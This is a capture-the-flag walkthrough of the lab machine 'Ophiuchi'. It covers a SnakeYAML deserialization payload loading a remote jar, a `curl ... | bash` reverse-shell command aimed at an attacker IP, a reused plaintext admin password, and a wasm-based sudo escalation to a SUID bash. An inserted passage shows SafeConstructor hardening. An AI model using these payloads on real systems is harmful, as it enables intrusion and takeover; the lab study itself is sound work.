Machine Ophiuchi - Medium - Linux
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 63
8080/tcp open http-proxy syn-ack ttl 63
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 6d:fc:68:e2:da:5e:80:df:bc:d0:45:f5:29:db:04:ee (RSA)
| 256 7a:c9:83:7e:13:cb:c3:f9:59:1e:53:21:ab:19:76:ab (ECDSA)
|_ 256 17:6b:c3:a8:fc:5d:36:08:a1:40:89:d2:f4:0a:c6:46 (ED25519)
8080/tcp open http Apache Tomcat 9.0.38
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Parse YAML
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
- fuzz
- test/ → shows it is Tomcat 9.0.38
- admin/ → tomcat admin
- googled YAML injection; lots of hits on the SnakeYAML library, which has a deserialization vulnerability
- using this test payload:
!!javax.script.ScriptEngineManager [
!!java.net.URLClassLoader [[
!!java.net.URL ["10.10.14.6:8000"]
]]
]
a big 500 error page shows:
Can't construct a java object for tag:yaml.org,2002:java.net.URL; exception=java.lang.reflect.InvocationTargetException
in 'string', line 3, column 5:
!!java.net.URL ["10.10.14.6:8000"]
which shows it is reaching (and crashing) the SnakeYAML parser! we are on the right track
exploit YAML parsing (Java SnakeYAML)
let’s clone https://github.com/artsploit/yaml-payload
modify to execute Runtime.getRuntime().exec("curl http://10.10.14.6:8000/script.sh | bash");
compile to generate the class and the jar as the readme says
create a script.sh with the bash reverse shell
now we can use the payload to execute things on the machine:
!!javax.script.ScriptEngineManager [
!!java.net.URLClassLoader [[
!!java.net.URL ["http://10.10.14.6:8000/yaml-payload.jar"]
]]
]
and it failed because my Java compiler is too new: java.lang.UnsupportedClassVersionError: artsploit/AwesomeScriptEngineFactory has been compiled by a more recent version of the Java Runtime
using sdkman, I installed java8…
recompile… and seems that it worked, but I didn’t get the reverse shell…
but I saw that the jar and the script.sh were requested
Yeeey! I have a shell as tomcat
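For the defender's side of this step, an added example (not from the writeup or from the yaml-payload project): the default SnakeYAML 1.x `Yaml()` load that resolves `!!` tags to arbitrary JVM classes, beside the `SafeConstructor` form that rejects them. The host in the sample document is a placeholder, and the SnakeYAML 1.x API (no-arg `SafeConstructor`) is assumed.

```java
import org.yaml.snakeyaml.Yaml;
import org.yaml.snakeyaml.constructor.ConstructorException;
import org.yaml.snakeyaml.constructor.SafeConstructor;

public class YamlLoadDemo {
    // Constructed sample with the shape of the probe above; host and jar name are placeholders.
    static final String PROBE =
        "!!javax.script.ScriptEngineManager [\n" +
        "  !!java.net.URLClassLoader [[\n" +
        "    !!java.net.URL [\"http://ATTACKER_HOST_PLACEHOLDER:8000/payload.jar\"]\n" +
        "  ]]\n" +
        "]";

    // Vulnerable pattern: the default constructor instantiates whatever class a !! tag names.
    // Shown for contrast only; never invoked here.
    static Object loadUnsafe(String doc) {
        return new Yaml().load(doc);
    }

    // Hardened pattern: SafeConstructor only builds standard YAML types (maps, lists, scalars)
    // and throws ConstructorException for any tag it does not know.
    static Object loadSafe(String doc) {
        return new Yaml(new SafeConstructor()).load(doc);
    }

    public static void main(String[] args) {
        try {
            loadSafe(PROBE);
            System.out.println("unexpected: probe was accepted");
        } catch (ConstructorException e) {
            // Expected: "could not determine a constructor for the tag tag:yaml.org,2002:javax.script.ScriptEngineManager"
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

On the Tomcat side, a ConstructorException surfacing as a 500 (as in the error above) is itself a useful detection signal for this probe.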
from tomcat to admin
checked tomcat-users.xml and found a password for admin: password="whythereisalimit"
let's try to SSH in with it… yey! we are admin!
from admin to …
admin@ophiuchi:~$ sudo -l
Matching Defaults entries for admin on ophiuchi:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User admin may run the following commands on ophiuchi:
(ALL) NOPASSWD: /usr/bin/go run /opt/wasm-functions/index.go
cool, that's a bit more tricky… to make it work we have to modify main.wasm, so we have to understand it and change the value it returns
reverse engineer a wasm
with wasm-decompile we can see the real code:
export memory memory(initial: 16, max: 0);
global g_a:int = 1048576;
export global data_end:int = 1048576;
export global heap_base:int = 1048576;
table T_a:funcref(min: 1, max: 1);
export function info():int {
return 0
}
now let's see if we can do something similar
on my computer I built another wasm that returns 1 (to pass the condition) → this makes it execute a bash script I could hijack (by running it from another directory)
with that, set the SUID bit on /bin/bash and finished!